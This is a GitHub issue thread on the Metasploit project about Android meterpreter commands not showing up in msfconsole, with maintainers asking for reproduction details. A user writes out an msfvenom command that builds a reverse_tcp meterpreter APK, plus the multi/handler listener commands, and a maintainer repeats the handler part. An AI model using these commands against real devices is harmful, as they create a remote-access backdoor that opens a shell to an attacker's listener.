Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

android commands missing meterpreter #11410

Closed
4 tasks
manikantaraavi opened this issue Feb 15, 2019 · 7 comments
Closed
4 tasks

android commands missing meterpreter #11410

manikantaraavi opened this issue Feb 15, 2019 · 7 comments
Labels

Comments

@manikantaraavi
Copy link

Steps to reproduce

How'd you do it?

  1. ...
  2. ...

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

Expected behavior

What should happen?

Current behavior

What happens instead?

You might also want to check the last ~1k lines of
/opt/metasploit/apps/pro/engine/config/logs/framework.log or
~/.msf4/logs/framework.log for relevant stack traces

System stuff

Metasploit version

Get this with the version command in msfconsole (or git log -1 --pretty=oneline for a source install).

I installed Metasploit with:

OS

What OS are you running Metasploit on?

@manikantaraavi
Copy link
Author

please help me andriod commands missing in metasploit
thanks in advance
verison:v5.0.6-dev-

@bcoles
Copy link
Contributor

bcoles commented Feb 15, 2019

Steps to reproduce

How'd you do it?

  1. ...
  2. ...

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

Expected behavior

What should happen?

Current behavior

What happens instead?

You might also want to check the last ~1k lines of
/opt/metasploit/apps/pro/engine/config/logs/framework.log or
~/.msf4/logs/framework.log for relevant stack traces

System stuff

Metasploit version

Get this with the version command in msfconsole (or git log -1 --pretty=oneline for a source install).

I installed Metasploit with:

OS

What OS are you running Metasploit on?

@manikantaraavi
Copy link
Author

i am using kali linux

@jmartin-tech
Copy link
Contributor

@manikantaraavi, the PR template asks for details that are needed to reproduce the issue reported. Please add all the details requested including steps required to recreate the issue.

@manikantaraavi
Copy link
Author

i am using kali linux metasploit i up to date
metasploit version
Framework: 5.0.7-dev-
Console : 5.0.7-dev-
please help me i am in bring trouble

@wvu wvu changed the title andriod commands missing meterpreter androidd commands missing meterpreter Feb 21, 2019
@wvu wvu changed the title androidd commands missing meterpreter android commands missing meterpreter Feb 21, 2019
@manikantaraavi
Copy link
Author

i will create a apk using this command in metasploit
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895 R > meterpreter.apk
And commands i use to exploit andriod
msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.0.104
set LPORT 4895
exploit

And I am not getting Andriod Commands in msfconsole
These are the screenshots Below Attached
please Help Me
screenshot from 2019-02-22 14-09-17
screenshot from 2019-02-22 14-09-29
screenshot from 2019-02-22 14-09-37
screenshot from 2019-02-22 14-09-44

@timwr
Copy link
Contributor

timwr commented Feb 22, 2019

Are you sure you're inputting this:

use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.0.104
set LPORT 4895
exploit

Into msfconsole?
The screenshots you've attached don't show that.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

4 participants